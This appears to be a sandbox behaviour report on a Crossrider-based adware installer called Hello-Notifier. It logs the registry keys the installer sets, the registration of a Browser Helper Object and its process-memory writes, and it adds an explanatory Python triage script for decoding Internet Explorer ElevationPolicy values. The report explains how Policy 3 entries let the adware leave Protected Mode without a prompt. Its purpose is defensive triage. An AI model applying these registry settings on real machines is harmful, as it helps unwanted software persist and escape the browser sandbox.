Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppName = "Hello-Notifier-bg.exe" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppName = "Hello-Notifier-codedownloader.exe" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppName = "Hello-Notifier-buttonutil64.exe" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5EFA9B9B-8BA5-4DD0-AA9F-7802DC493E}\AppName = "Hello-Notifier-enabler.exe-codedownloader.exe" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5EFA9B9B-8BA5-4DD0-AA9F-7802DC493E}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0} C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppName = "Hello-Notifier-buttonutil.exe" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4} C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\Policy = "1" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppName = "Hello-Notifier-bg.exe" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\Policy = "1" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5EFA9B9B-8BA5-4DD0-AA9F-7802DC493E} C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0} C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0} C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
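Two of the registry tables above define the adware's reach inside the browser: the Browser Helper Object registration of CLSID {11111111-1111-1111-1111-110311791128} (display name "CrossriderApp0037928", NoExplorer = 1, registered in both the native and the Wow6432Node view), and the Internet Explorer Low Rights ElevationPolicy entries. An ElevationPolicy key tells IE Protected Mode how to treat a process that a low-integrity tab tries to start: Policy 0 blocks the launch, 1 launches it silently at low integrity, 2 prompts the user and then launches at medium integrity, and 3 launches it silently at medium integrity. The installer sets Policy 3 for codedownloader, helper and both buttonutil binaries, which lets code running inside IE's low-integrity process start them outside the Protected Mode sandbox with no prompt, and Policy 1 for bg.exe. The Python below is an added example, not part of this report or of any tool it references: it parses a subset of the registry rows above (copied from the tables), merges the native and Wow6432Node views per CLSID/GUID, and decodes each Policy value. The Policy meanings are Microsoft's documented Protected Mode semantics; the function names and output layout are this example's own.

```python
"""Triage of sandbox registry events (added example, not part of the report).

Parses "Key created" / "Set value" rows, merges native and Wow6432Node views,
and decodes Browser Helper Object registrations and IE ElevationPolicy entries.
"""
import re
from collections import defaultdict

# Constructed input: a subset of the BHO and IE-settings rows from the tables above.
SAMPLE_ROWS = r"""
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\ = "CrossriderApp0037928" C:\Windows\system32\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\NoExplorer = "1" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\ = "CrossriderApp0037928" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppName = "Hello-Notifier-codedownloader.exe" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppName = "Hello-Notifier-bg.exe" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\Policy = "1" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\AppName = "Hello-Notifier-helper.exe" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppName = "Hello-Notifier-buttonutil.exe" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppName = "Hello-Notifier-buttonutil64.exe" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
""".strip().splitlines()

# Row layout: <action> <key>[\<value name> = "<data>"] <process> N/A. Keys contain spaces,
# so the process path is located by its drive-letter prefix and the data by its quotes.
ROW_RE = re.compile(
    r"^(?P<action>Key created|Key deleted|Key opened|Set value \((?:str|int)\))\s+"
    r"(?P<key>\\REGISTRY\\.+?)"
    r'(?:\s+=\s+"(?P<value>[^"]*)")?'
    r"\s+(?P<process>[A-Za-z]:\\.+?)\s+N/A$"
)
GUID_RE = re.compile(r"\{[0-9A-Fa-f-]+\}$")

# Documented meaning of the ElevationPolicy "Policy" DWORD for IE Protected Mode.
POLICY_MEANING = {
    "0": "launch blocked",
    "1": "silent launch at low integrity",
    "2": "user prompted, then launched at medium integrity",
    "3": "silent launch at medium integrity (leaves Protected Mode without a prompt)",
}


def parse_rows(rows):
    """Return one event dict per row that fits the layout; other rows are skipped."""
    events = []
    for row in rows:
        m = ROW_RE.match(row.strip())
        if not m:
            continue
        key, value_name = m["key"], None
        if m["action"].startswith("Set value"):
            key, _, value_name = key.rpartition("\\")  # trailing "\" means the default value
        events.append({
            "action": m["action"], "key": key, "value_name": value_name,
            "value": m["value"], "process": m["process"],
            "hive": "HKLM" if key.upper().startswith("\\REGISTRY\\MACHINE") else "HKU",
            "view": "Wow6432Node" if "\\wow6432node\\" in key.lower() else "native",
        })
    return events


def triage(events):
    bho = defaultdict(lambda: {"name": None, "no_explorer": None, "views": set(), "processes": set()})
    elev = defaultdict(lambda: {"app_name": None, "app_path": None, "policy": None, "hives": set()})
    for e in events:
        g = GUID_RE.search(e["key"])
        if not g:
            continue
        guid, low, vname = g.group(0).lower(), e["key"].lower(), (e["value_name"] or "").lower()
        if "\\explorer\\browser helper objects\\" in low:
            rec = bho[guid]
            rec["views"].add(e["view"])
            rec["processes"].add(e["process"])
            if e["value_name"] == "":      # default value holds the BHO display name
                rec["name"] = e["value"]
            elif vname == "noexplorer":    # "1": load in IE only, not in Windows Explorer
                rec["no_explorer"] = e["value"]
        elif "\\low rights\\elevationpolicy\\" in low:
            rec = elev[guid]
            rec["hives"].add(f'{e["hive"]}/{e["view"]}')
            field = {"appname": "app_name", "apppath": "app_path", "policy": "policy"}.get(vname)
            if field:
                rec[field] = e["value"]
    for rec in elev.values():
        rec["meaning"] = POLICY_MEANING.get(rec["policy"], "unknown")
    return {"bho": dict(bho), "elevation_policy": dict(elev)}


def silent_medium_integrity(result):
    """Binaries Protected Mode will start at medium integrity with no prompt (Policy 3)."""
    return sorted(r["app_name"] for r in result["elevation_policy"].values()
                  if r["policy"] == "3" and r["app_name"])


if __name__ == "__main__":
    res = triage(parse_rows(SAMPLE_ROWS))
    for clsid, rec in res["bho"].items():
        print("BHO", clsid, rec["name"], "views:", sorted(rec["views"]))
    for guid, rec in res["elevation_policy"].items():
        print("ElevationPolicy", guid, rec["app_name"], "->", rec["meaning"])
    print("silent medium-integrity launch:", silent_medium_integrity(res))
```

On a live host the same decoding applies to the output of reg.exe or a hive export: any ElevationPolicy GUID with Policy 3 whose AppPath is outside Program Files or whose AppName does not belong to software you installed deserves a look, and a BHO CLSID whose InprocServer32 points at an unsigned DLL (this sample's Hello-Notifier-bho.dll is flagged "Unsigned PE" above) is worth removing outright.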

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\VersionIndependentProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\VersionIndependentProgID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\VersionIndependentProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\TypeLib\ = "{44444444-4444-4444-4444-440344794428}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{66666666-6666-6666-6666-660366796628}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660366796628}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660366796628}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.Sandbox\ = "CrossriderApp0037928.Sandbox" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.Sandbox\CLSID\ = "{22222222-2222-2222-2222-220322792228}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\Hello-Notifier" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55555555-5555-5555-5555-550355795528} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.Sandbox\ = "CrossriderApp0037928.Sandbox" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\ = "Hello-Notifier" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322792228}\ = "CrossriderApp0037928.Sandbox" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.Sandbox.1 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0\HELPDIR C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\VersionIndependentProgID\ = "CrossriderApp0037928" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\VersionIndependentProgID\ = "CrossriderApp0037928.Sandbox" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0\0\win32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0\0\win32\ = "C:\\Program Files (x86)\\Hello-Notifier\\Hello-Notifier-bho.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{55555555-5555-5555-5555-550355795528}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.Sandbox.1\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO.1\CLSID\ = "{11111111-1111-1111-1111-110311791128}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0\FLAGS\ = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO.1\CLSID\ = "{11111111-1111-1111-1111-110311791128}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\Programmable C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\Programmable C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories\ C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55555555-5555-5555-5555-550355795528}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO\CLSID\ = "{11111111-1111-1111-1111-110311791128}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\ProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660366796628}\TypeLib\ = "{44444444-4444-4444-4444-440344794428}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO.1\ = "CrossriderApp0037928" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO.1\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\ProgID\ = "CrossriderApp0037928.Sandbox.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{66666666-6666-6666-6666-660366796628}\TypeLib\ = "{44444444-4444-4444-4444-440344794428}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\ProgID\ = "CrossriderApp0037928.BHO.1" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322792228}\ProgID C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories\ C:\Windows\SysWOW64\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640} C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322792228} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO\CLSID\ = "{11111111-1111-1111-1111-110311791128}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{55555555-5555-5555-5555-550355795528}\ = "ICrossriderBHO" C:\Windows\SysWOW64\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\VersionIndependentProgID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\ProgID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{55555555-5555-5555-5555-550355795528}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{66666666-6666-6666-6666-660366796628}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660366796628}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0\0\win64\ = "C:\\Program Files (x86)\\Hello-Notifier\\Hello-Notifier-bho64.dll" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO.1 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2904 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe
PID 2904 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe
PID 2904 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe
PID 2904 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe
PID 2116 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe
PID 2116 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe
PID 2116 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe
PID 2116 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe
